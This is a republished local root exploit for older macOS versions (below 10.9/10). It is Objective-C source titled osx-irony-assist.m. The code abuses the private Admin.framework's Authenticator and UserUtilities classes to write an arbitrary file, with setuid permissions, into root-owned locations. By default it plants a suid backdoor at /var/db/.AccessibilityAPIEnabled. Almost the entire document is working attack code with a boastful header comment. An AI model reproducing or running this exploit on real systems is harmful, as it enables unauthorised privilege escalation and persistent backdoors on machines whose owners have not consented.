Jeremy_heSSV:89320Apple MAC OS X < 10.9/10 - Local Root Exploit
<p>/* osx-irony-assist.m</p><p> </p><p> Copyright © 2010 by <[email protected]></p><p> </p><p> Apple MACOS X < 10.9/10? local root exploit</p><p> * by mu-b - June 2010</p><p> </p><p> - Tested on: Apple MACOS X <= 10.8.X</p><p> </p><p> $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $</p><p> </p><p> The most ironic backdoor perhaps in the history of backdoors.</p><p> * Enabling ‘Assistive Devices’ in the ‘Universal Access’ preferences pane</p><p> * uses this technique to drop a file (“/var/db/.AccessibilityAPIEnabled”)</p><p> * in a directory,</p><p> </p><p> drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db</p><p> </p><p> without being root, now how did you do that?</p><p> </p><p> Copy what you want, wherever you want it, with whatever permissions you</p><p> * desire, hmmm, backdoor?</p><p> </p><p> This is now fixed, so I guess this is OK :-)</p><p> </p><p> - Private Source Code -DO NOT DISTRIBUTE -</p><p> * <a href=“http://www.digit-labs.org/”>http://www.digit-labs.org/</a> – Digit-Labs 2010!@$!</p><p> */</p>
#include <stdio.h>
#include <stdlib.h>
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>
/* where you want to write it! */
#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"
int do_assistive_copy(const char *spath, const char *dpath)
{
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
id authenticatorInstance, *userUtilsInstance;
Class authenticatorClass, userUtilsClass;
(void) pool;
NSBundle *adminBundle =
[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
authenticatorClass = [adminBundle classNamed:@"Authenticator"];
if (!authenticatorClass)
{
fprintf (stderr, "* failed locating the Authenticator Class\n");
return (EXIT_FAILURE);
}
printf ("* Found Authenticator Class!\n");
authenticatorInstance =
[authenticatorClass performSelector:@selector(sharedAuthenticator)];
userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
if (!userUtilsClass)
{
fprintf (stderr, "* failed locating the UserUtilities Class\n");
return (EXIT_FAILURE);
}
printf ("* found UserUtilities Class!\n");
userUtilsInstance = (id *) [userUtilsClass alloc];
SFAuthorization *authObj = [SFAuthorization authorization];
OSStatus isAuthed = (OSStatus)
[authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
withObject:authObj];
printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);
NSData *suidBin =
[NSData dataWithContentsOfFile:[NSString stringWithCString:spath
encoding:NSASCIIStringEncoding]];
if (!suidBin)
{
fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
return (EXIT_FAILURE);
}
NSDictionary *createFileWithContentsDict =
[NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
forKey:(id)NSFilePosixPermissions];
if (!createFileWithContentsDict)
{
fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
return (EXIT_FAILURE);
}
CFStringRef writePath =
CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
[*userUtilsInstance createFileWithContents:suidBin path:writePath
attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
printf ("* now execute suid backdoor at %s\n", dpath);
/* send the "Distributed Object Message" to the defaultCenter,
* is this really necessary? (not for ownage)
*/
[[NSDistributedNotificationCenter defaultCenter]
postNotificationName:@"com.apple.accessibility.api"
object:@"system.preferences" userInfo:nil
deliverImmediately:YES];
return (EXIT_SUCCESS);
}
int main (int argc, const char * argv[])
{
printf ("Apple MACOS X < 10.9/10? local root exploit\n"
"by: <[email protected]>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
exit (EXIT_SUCCESS);
}
return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}